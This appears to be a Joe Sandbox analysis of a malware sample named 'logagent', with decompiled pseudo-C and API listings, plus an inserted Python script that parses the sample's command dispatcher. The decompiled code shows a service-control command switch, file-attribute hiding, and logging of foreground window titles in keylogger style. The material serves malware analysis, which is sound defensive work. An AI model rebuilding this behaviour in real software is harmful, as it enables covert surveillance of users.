                                  					goto L23;
                                  				}
                                  				if(_t112 != 1) {
                                  					goto L26;
                                  				}
                                  				_t123 = E004119AD( &_v20, 2);
                                  				__imp__??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z(0);
                                  				_push( *_t123);
                                  				_t125 = E004119AD( &_v20, 0);
                                  				_t264 = _t233 - 0x10;
                                  				_push(_t125);
                                  				_push(_t264);
                                  				E00412881(_t125);
                                  				_t127 = E00411927();
                                  				_t265 = _t264 + 0x14;
                                  				if(_t127 == 0) {
                                  					_push(E004119AD( &_v20, 1));
                                  					_push(0x41b310);
                                  					_push(E004119AD( &_v20, 0));
                                  					_t130 =  &_v104;
                                  					_push(_t130);
                                  					L00414140();
                                  					_push(_t130);
                                  					L00414140();
                                  					E004020C2(0x41c130, 0x84, _t265 - 0x10);
                                  				} else {
                                  					_t135 =  &_v200;
                                  					L00414140();
                                  					_t136 =  &_v168;
                                  					L00414140();
                                  					_t137 =  &_v40;
                                  					L00414140();
                                  					L00414140();
                                  					E004020C2(0x41c130, 0x7e, _t265 - 0x10);
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t137, _t137, _t136, _t136, _t135, _t135, E004119AD( &_v20, 0), 0x41b310, E004119AD( &_v20, 1), 0x41b310, E004119AD( &_v20, 2));
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				}
                                  				goto L23;
                                  			}
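The decrement chain above (`_t85 = _t75 - 1; if(_t85 == 0)`, then `_t94`, `_t103`, `_t112`) is how the compiler lowered a switch on the sub-command number: each case pulls its string arguments with E004119AD, widens them with E00412881 (the basic_string<wchar_t> constructor in the API cross-reference), runs one service-manager helper, and answers through E004020C2 with a status byte, 0x7a to 0x7f on success or 0x81 to 0x84 when the helper returns zero. The roles of those three helpers are inferred from the call shapes and the listed APIs, not stated by the report. The script below is an added example, not part of the Joe Sandbox output: it reads a hand-reduced excerpt of the listing (constructed input, with only the selectors, helper calls, zero checks and response calls kept) and recovers the case-to-helper-to-status table an analyst would otherwise read off by hand.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Hand-reduced excerpt of the decompiled dispatcher (constructed input): only the
# case selectors, helper calls, zero checks and response calls are kept.
EXCERPT = """\
E004020C2(0x41c130, 0x7a, _t236 - 0x10);
_t85 = _t75 - 1;
if(_t85 == 0) {
    _t86 = E004119AD( &_v20, 0);
    _t88 = E00411760(_t241);
    if(_t88 == 0) {
        _push(0x81);
        goto L14;
    }
    E004020C2(0x41c130, 0x7b, _t242 - 0x10);
}
_t94 = _t85 - 1;
if(_t94 == 0) {
    _t97 = E00411859(_t247);
    if(_t97 == 0) {
        _push(0x82);
        goto L14;
    }
    E004020C2(0x41c130, 0x7c, _t248 - 0x10);
}
_t103 = _t94 - 1;
if(_t103 == 0) {
    _t106 = E004118C0(_t253);
    if(_t106 == 0) {
        _push(0x83);
        goto L14;
    }
    E004020C2(0x41c130, 0x7d, _t254 - 0x10);
}
_t112 = _t103 - 1;
if(_t112 == 0) {
    _v24 = E004117C7(_t233 - 0x10);
    E004020C2(0x41c130, 0x7f, _t233 - 0x10);
}
if(_t112 != 1) {
    goto L26;
}
_t127 = E00411927();
if(_t127 == 0) {
    E004020C2(0x41c130, 0x84, _t265 - 0x10);
} else {
    E004020C2(0x41c130, 0x7e, _t265 - 0x10);
}
"""

# Helpers that are not the per-command operation (roles inferred from the API
# cross-references, an assumption): E004119AD fetches argument n, E00412881
# widens the string, E004020C2 emits the response carrying the status byte.
SEND = "E004020C2"
NOT_AN_OPERATION = {"E004119AD", "E00412881", SEND}
DECREMENT = re.compile(r"_t\d+ = _t\d+ - 1;")
LAST_GUARD = re.compile(r"if\(_t\d+ != 1\) \{\s*goto L\d+;\s*\}")
STATUS = re.compile(SEND + r"\(0x41c130, (0x[0-9a-fA-F]+)")
CALL = re.compile(r"(_[tv]\d+) = (E00[0-9A-F]{6})\(")

@dataclass
class Case:
    index: int
    operation: Optional[str]  # helper doing the work; None if it lies outside the excerpt
    success: Optional[int]    # status byte sent when the helper returns non-zero
    failure: Optional[int]    # status byte sent when it returns zero

def split_cases(text):
    """Every 'x = y - 1' opens one more case of the lowered switch; the trailing
    '!= 1' guard separates the last two cases, which share one decrement."""
    pieces = DECREMENT.split(text)
    last = pieces.pop()
    return pieces + LAST_GUARD.split(last)

def parse_case(index, piece):
    op = next(((v, n) for v, n in CALL.findall(piece) if n not in NOT_AN_OPERATION), None)
    failure, body = None, piece
    if op:  # zero return is the error path: _push(code)/goto L14, or a direct send
        m = re.search(r"if\(%s == 0\) \{(.*?)\}" % re.escape(op[0]), piece, re.S)
        if m:
            code = re.search(r"_push\((0x[0-9a-fA-F]+)\)", m.group(1)) or STATUS.search(m.group(1))
            failure = int(code.group(1), 16) if code else None
            body = piece[:m.start()] + piece[m.end():]
    ok = STATUS.search(body)
    return Case(index, op[1] if op else None, int(ok.group(1), 16) if ok else None, failure)

def command_table(text=EXCERPT):
    return [parse_case(i, p) for i, p in enumerate(split_cases(text))]

if __name__ == "__main__":
    for c in command_table():
        fmt = lambda v: f"{v:#x}" if v is not None else "-"
        print(f"case {c.index}: helper={c.operation} ok={fmt(c.success)} fail={fmt(c.failure)}")
```

Case 5 is the one whose helper (E00411927) wraps OpenSCManagerW, OpenServiceW and CloseServiceHandle in the cross-reference below, so a failure there reports 0x84 straight from the zero branch rather than through the shared L14 error path the other cases use; the parser handles both shapes.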
                                  Instruction address column for the listing above (spilled by extraction into a separate column): 0x00410f16 to 0x004113c8.

                                  APIs
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 00410F16
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000001,6DF55DF0), ref: 00410F2E
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00410F38
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410F41
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00410F52
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00410F61
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000,00000001,0041B310,00000000), ref: 00411012
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,0041B310,00000000), ref: 00411022
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,00000000), ref: 0041102F
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000007E,?,?,?,?,?,?,?,?,?,?,0041B310,00000000), ref: 00411050
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310,00000000), ref: 0041105C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,00000000), ref: 00411039
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 0041108C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 00411096
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002,00000000), ref: 00410FB4
                                    • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                    • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                    • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                    • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                    • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                    • Part of subcall function 00411927: OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,0041B310,?,?,00410FD9), ref: 00411933
                                    • Part of subcall function 00411927: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,?,?,00410FD9), ref: 00411940
                                    • Part of subcall function 00411927: OpenServiceW.ADVAPI32(00000000,00000000,?,?,00410FD9), ref: 00411948
                                    • Part of subcall function 00411927: CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 00411955
                                    • Part of subcall function 00411927: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00410FD9), ref: 004119A0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000,00000001,0041B310,?), ref: 004110F4
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,0041B310,?), ref: 00411104
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,?), ref: 00411111
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,?), ref: 0041111B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000007F,?,?,?,?,?,?,?,?,?,?,0041B310,?), ref: 00411132
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310,?), ref: 0041113E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 0041118E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 00411198
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 0041121F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 00411229
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 004112A9
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 004112B3
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 00411336
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 00411340
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000007A,?,?,?,?,0041B310,00000000), ref: 0041135A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00411371
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000079), ref: 004113AD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0041B310,00000000), ref: 004113BE
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??1?$basic_string@$??0?$basic_string@V01@@$G@2@@std@@G@std@@$?length@?$basic_string@$V12@$??4?$basic_string@?c_str@?$basic_string@?substr@?$basic_string@A?$basic_string@OpenServiceV01@$??2@??3@?find@?$basic_string@CloseD@1@@G@1@@HandleManagerV10@
                                  • String ID:
                                  • API String ID: 3693186435-0
                                  • Opcode ID: 6a031edbff3384601f4aa8fc1298ee73ab53d8128c0f2dcfe8a7b61f8d4f597b
                                  • Instruction ID: 8efa13a56e58a3380b66c3db6183ea909b867b6e0f3936dc641b94412a702233
                                  • Opcode Fuzzy Hash: 6a031edbff3384601f4aa8fc1298ee73ab53d8128c0f2dcfe8a7b61f8d4f597b
                                  • Instruction Fuzzy Hash: E6C1B4B1D101086BDB04B7A2ED56DFF777CEB50304F00481EFA16A71D2EE395A89C66A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • Sleep.KERNEL32(00002710), ref: 00405607
                                    • Part of subcall function 00405532: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(80000000,00000007,00000000,00000003,00000080,00000000,00415664,?,0041BCB0,00405614), ref: 00405562
                                    • Part of subcall function 00405532: CreateFileW.KERNEL32(00000000), ref: 00405569
                                    • Part of subcall function 00405532: GetFileSize.KERNEL32(00000000,00000000), ref: 00405578
                                    • Part of subcall function 00405532: Sleep.KERNEL32(00002710), ref: 004055A7
                                    • Part of subcall function 00405532: CloseHandle.KERNEL32(00000000), ref: 004055AE
                                    • Part of subcall function 00405532: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004055D6
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 00405619
                                  • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 0040562E
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040563F
                                  • CreateDirectoryW.KERNEL32(00000000), ref: 00405646
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00405651
                                  • GetFileAttributesW.KERNEL32(00000000), ref: 00405658
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 00405669
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 00405670
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 00405681
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 00405690
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040569D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004056AA
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004056C5
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004056D0
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004056DC
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004056F0
                                  • PathFileExistsW.SHLWAPI(00000000), ref: 004056F7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405708
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00405714
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(7620F560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,7620F560,?,00409C9F,00000000), ref: 00412DF9
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405729
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040574D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405756
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405733
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                    • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                    • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040575F
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040576F
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405778
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405782
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000), ref: 0040579A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004057AA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004057BB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004057C4
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 004057D1
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000013), ref: 004057E2
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000006), ref: 004057F1
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 004057F8
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$?c_str@?$basic_string@$G@2@@std@@G@std@@$File$??0?$basic_string@$??1?$basic_string@V01@@$?length@?$basic_string@$?data@?$basic_string@AttributesCreateD@1@@V01@$??4?$basic_string@Sleep$??9std@@?empty@?$basic_string@CloseD@2@@0@DirectoryExistsHandlePathSizeV?$basic_string@Y?$basic_string@
                                  • String ID:
                                  • API String ID: 3042614570-0
                                  • Opcode ID: 575ddf90373583570e2370749e334e5a8c8c652185d1d6edf2812296b84c8a7a
                                  • Instruction ID: c86808d706488c02b7588af0601caf96bbb35f31f7bc76b7b462248bc21621a9
                                  • Opcode Fuzzy Hash: 575ddf90373583570e2370749e334e5a8c8c652185d1d6edf2812296b84c8a7a
                                  • Instruction Fuzzy Hash: B0514E72A00909EBCB05ABA0ED5DADE7B78EF84315F04807AF503A71A0DF745A45CF98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E004059BE(intOrPtr __ecx) {
                                  				char _v5;
                                  				char _v6;
                                  				char _v7;
                                  				intOrPtr _v12;
                                  				signed int _v16;
                                  				char _v28;
                                  				char _v44;
                                  				char _v60;
                                  				char _v76;
                                  				void* _v92;
                                  				intOrPtr _t41;
                                  				int _t43;
                                  				CHAR* _t45;
                                  				signed int _t48;
                                  				char* _t58;
                                  				char* _t59;
                                  				struct HWND__* _t93;
                                  				intOrPtr _t94;
                                  				void* _t99;
                                  				intOrPtr _t112;
                                  
                                  				_v12 = __ecx;
                                  				while(1) {
                                  					_t41 = _v12;
                                  					if( *((intOrPtr*)(_t41 + 0x3c)) == 0 &&  *((intOrPtr*)(_t41 + 0x3d)) == 0) {
                                  						break;
                                  					}
                                  					if(( *0x41b990 & 0x00000001) == 0) {
                                  						 *0x41b990 =  *0x41b990 | 0x00000001;
                                  						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
                                  						E00413E72(E00405BB5);
                                  					}
                                  					Sleep(0x1f4);
                                  					_t93 = GetForegroundWindow();
                                  					_t43 = GetWindowTextLengthA(_t93);
                                  					_t95 = _t43;
                                  					_t9 = _t95 + 1; // 0x1
                                  					_t45 = _t9;
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z(_t45, 0,  &_v6);
                                  					if(_t43 != 0) {
                                  						__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  						GetWindowTextA(_t93, _t45, _t45);
                                  						_t58 =  &_v44;
                                  						__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z(_t58, 0x41b998);
                                  						if(_t58 == 0) {
                                  							_t59 =  &_v44;
                                  							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t59);
                                  							__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  							__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z(_t59 - 1);
                                  							_t112 =  *0x41b93e; // 0x0
                                  							if(_t112 == 0) {
                                  								_t103 = _t99 - 0x10;
                                  								L00414176();
                                  								L00414170();
                                  								_t99 = _t99 - 0x10 + 0x18;
                                  								E004054E9(_v12, _t103,  &_v60,  &_v60, "\r\n[ ",  &_v44);
                                  								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(" ]\r\n", 0);
                                  							} else {
                                  								_t99 = _t99 - 0x10;
                                  								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  								E00405DD3(_v12,  &_v44);
                                  							}
                                  						}
                                  					}
                                  					_t94 = _v12;
                                  					_t71 = _t94;
                                  					E00406C35(_t94);
                                  					if(E0041269B(_t94) < 0xea60) {
                                  						L16:
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						continue;
                                  					} else {
                                  						while( *((intOrPtr*)(_t94 + 0x3c)) != 0 ||  *((intOrPtr*)(_t94 + 0x3d)) != 0) {
                                  							_t48 = E0041269B(_t71);
                                  							if(_t48 < 0xea60) {
                                  								__imp___itoa(_v16 / 0xea60,  &_v28, 0xa);
                                  								_t101 = _t99 + 0xc - 0x10;
